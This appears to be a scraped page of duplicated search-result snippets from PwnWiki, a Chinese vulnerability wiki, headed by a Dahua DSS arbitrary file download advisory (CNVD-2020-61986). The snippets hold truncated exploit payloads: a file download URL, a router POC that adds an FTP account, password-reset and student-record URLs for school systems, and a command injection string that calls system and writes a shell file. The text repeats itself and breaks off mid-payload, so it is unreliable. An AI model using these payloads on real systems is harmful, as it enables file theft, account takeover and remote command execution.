CNVD-2020-61986 大华DSS系统任意文件下载漏洞/zh-cn
PWNWIK.COM , 漏洞简介 浙江大华技术股份有限公司DSS存在任意文件下载漏洞,攻击者可利用该漏洞登录界面下载任意文件获取敏感信息。 Payload http://ip/itc/attachment_downloadByUrlAtt ...
PWNWIK.COM , 漏洞简介 浙江大华技术股份有限公司DSS存在任意文件下载漏洞,攻击者可利用该漏洞登录界面下载任意文件获取敏感信息。 Payload http://ip/itc/attachment_downloadByUrlAtt ...
免费、自由、人人可编辑的漏洞库--pwnwiki.com , 漏洞简介 浙江大华技术股份有限公司DSS存在任意文件下载漏洞,攻击者可利用该漏洞登录界面下载任意文件获取敏感信息。 Payload http://ip/itc/attachmen ...
免费、自由、人人可编辑的漏洞库 , FOFA app="Misstar-Tools-小米路由器" POC http://<target>:1024/ 新增FTP账户,重启FTP服务 PWNWIK.COM
PWNWIK.COM==免费、自由、人人可编辑的漏洞库 , FOFA app="Misstar-Tools-小米路由器" POC http://<target>:1024/ 新增FTP账户,重启FTP服务。 pwnwiki.co ...
PWNWIK.COM==免费、自由、人人可编辑的漏洞库 , 漏洞利用 登入系统 https://<target>/gmis/login.aspx 查看学生信息(XXXXXXXXX为学号) https://<target&g ...
免费、自由、人人可编辑的漏洞库--pwnwiki.com , 前提条件 该漏洞需要普通用户身份登录平台,登录平台后可以以普通用户的权限重置所有用户(包括管理员)的密码。 https://<target>/dpc/ 默认用户信息 ...
PWNWIK.COM==免费、自由、人人可编辑的漏洞库 , 漏洞利用 https://<target>/pyxx/grgl/xsmmxg.aspx 修改学号为需要重置账号密码的账号,保存即可。 PWNWIK.COM
PWNWIK.COM , 漏洞利用 https://<target>/pyxx/grgl/xsmmxg.aspx 修改学号为需要重置账号密码的账号,保存即可。 免费、自由、人人可编辑的漏洞库
pwnwiki.com , 漏洞影响 v4.8.54 Payload s=dir&_method=__construct&method=*&filter=system s=echo "shell" >shell ...
免费、自由、人人可编辑的漏洞库--PwnWiki.com , 漏洞影响 v4.8.54 Payload s=dir&_method=__construct&method=*&filter=system s=echo ...